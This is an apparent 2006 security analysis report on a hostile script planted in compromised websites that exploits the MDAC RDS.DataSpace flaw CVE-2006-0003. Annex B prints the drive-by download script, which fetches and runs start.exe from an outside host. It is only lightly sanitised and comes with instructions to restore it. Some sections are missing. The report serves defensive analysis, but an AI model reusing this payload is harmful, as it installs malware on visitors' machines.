Beruflich Dokumente
Kultur Dokumente
10 May 06
IH&AA Supervisor
ANALYSIS REPORT-
HOSTILE SCRIPT (CVE-2006-0003)
INTRODUCTION
1. (U) Recently it appears that several websites were compromised and a hostile
script inserted into the HTML source; follow-up investigation appears to indicate that
the compromises in question may have occurred sometime in April 2006.
2. (U) In order to determine the nature of the threat and the vulnerability
associated with the hostile code, initial analysis of this threat was conducted in the
author's personal computer laboratory.
AIM
5. (U) VMWare was utilized to emulate both patched and unpatched Windows
XP/Windows 2000 platforms; the virtual machines were reinitialized after each visit
in order to ensure that the results were unadulterated.
1
6. (U) Whilst loading the compromised webpage, a hostile script embedded in
the page's HTML source (refer to annex B) runs and attempts to install malware
designated "start.exe" from one of the following URIs (the URIs purposely broken to
prevent accidental infection:
a. h t t p://dnv-counter.com/trf/start.exe; or
b. h t t p://us-counter.counter.com/trf/start.exe.
7. (U) In addition to downloading the malware in question, the hostile code also
appears to incorporate a web counter facility; this is conceivably used by the entity
responsible for the malware in order to record the number of compromised hosts.
8. (U) The following patch levels and operating systems were tested in the
course of this investigation; current patches appear to be effective in preventing
exploitation by the hostile script:
a. McAfee - PWS-JA;
b. Norton - Trojan.Download;
10. (U) The script in question contained several obfuscated strings; obfuscation of
hostile code is a very common technique used to evade detection and hinder
analysis. All of the obfuscated and reconstituted strings found in the hostile script are
demonstrated in annex C.
2
11. (U) One of the reconstituted strings appeared to be a Class ID1 (clasid)
designated "BD96C556-65A3-11D0-983A"; this clasid corresponds to the client-side
RDS.DataSpace2 object.
12. (U) The hostile code appears to specifically address the RDS.DataSpace
object, which is deployed in Windows installations as an MDAC3 component.
Considering this, the script clearly exploits the CVE-2006-0003 vulnerabilityi; the
patches associated with Microsoft Security Bulletin MS06-014ii, issued on 11 April
2006, address this vulnerability.
13. (U) This exploit is a potential threat to the organization's network assets for
the following reasons:
b. the organization's current patch level does not include the patches
associated with the MS06-014 vulnerability.
14. (U) As a result of the conclusions reached from the analysis of this threat, the
following recommendations are hereby submitted for consideration:
1
A clsid ("Class ID") is a globally unique identifier that serves to identify a COM ("Component Object
Module") class object; COM is a Microsoft platform for software componentry that enables interprocess
communication and dynamic object creation in any programming language that supports the technology.
2
RDS (Remote Data Services) is a set of programming interfaces from Microsoft that enables users to
update data on the Internet or intranets from their ActiveX-enabled browser.
3
MDAC (Microsoft Data Access Components) is a package of database drivers from Microsoft used for
connecting client PCs to databases in servers.
3
15. (U) Any questions regarding this report may be addressed to the
undersigned.
//signed//
Attachments:
Annexes A-C
4
Annex A - Laboratory Configuration
(U) The laboratory configuration utilized for the analysis associated with this
report is demonstrated in the diagram below; the "Victim" host uses VMWare to emulate
patched/unpatched versions of Windows XP Pro and Windows 2000.
Internet
Receive-Only
CAT5
Hub External IDS/Sniffer
Router
Receive-Only
CAT5
Hub Internal IDS/Sniffer
Victim
5
Annex B - Hostile Script
The sanitized version of the hostile script in question may be found below; should
it be necessary to restore the script's functionality for lab purposes, simply delete all the
[DELETE THIS] strings.
<script>
function f[DELETE THIS](b, a, c) { return a + b + c; }
function g[DELETE THIS](b, a) { return a + b; }
var s[DELETE THIS] = new Array
(
"",
"start.[DELETE THIS]exe",
"http://[DELETE THIS]dnv-counter.com/trf/blank.html",
"object[DELETE THIS]",
"classid[DELETE THIS]",
f[DELETE THIS]("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"),
g("9E36", "4FC2")),
g[DELETE THIS](f("ft.XMLH", "oso", "TTP"), "Micr"),
f[DELETE THIS]("E", "G", "T"),
f[DELETE THIS](g(".Str", "odb"), "Ad", "eam"),
f[DELETE THIS](g(".She", "ipt"), "WScr", "ll"),
"[DELETE THIS]PROCESS",
"[DELETE THIS]TMP",
"[DELETE THIS]/[^/]*$",
"[DELETE THIS]/",
"[DELETE THIS]\\"
);
a = [DELETE THIS]document.createElement(s[3]);
a.setAttribute[DELETE THIS](s[4], s[5]);
with[DELETE THIS](a.CreateObject(s[6], s[0]))
{
open[DELETE THIS](s[7], location.href.replace(new RegExp[DELETE THIS](s[12]),
s[13] + s[1]), false);
send[DELETE THIS]();
if[DELETE THIS](status < 400)
with[DELETE THIS](a.CreateObject(s[8], s[0]))
{
Type[DELETE THIS] = 1;
Open[DELETE THIS]();
Write[DELETE THIS](responseBody);
with[DELETE THIS](a.CreateObject(s[9], s[0]))
{
c[DELETE THIS] = Environment[DELETE THIS](s[10])(s[11]) + s[14] + s[1];
SaveToFile[DELETE THIS](c, 2);
Exec[DELETE THIS](c);
}
}
}
location.replace[DELETE THIS](s[2]);
// -->
</script>
</html>
6
<!-- Start of [DELETE THIS]StatCounter Code -->
<script type="text/[DELETE THIS]javascript" language[DELETE THIS]="[DELETE
THIS]javascript">
var sc_project[DELETE THIS]=1504492;
var sc_invisible[DELETE THIS]=1;
var sc_partition[DELETE THIS]=13;
var sc_security=[DELETE THIS]"f5ae647d";
</script>
7
Annex C -
Several obfuscated strings were noted in the script; the strings, both obfuscated
and reconstituted, are demonstrated below.
8
References:
i
Common Vulnerabilities and Exposures. "CVE-2006-0003". Online document. Apr 11, 2006.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003.
ii
Microsoft Technet. "Microsoft Security Bulletin MS06-014". Online document. Apr 11, 2006
http://securityresponse.symantec.com/avcenter/reference/blended.attacks.pdf.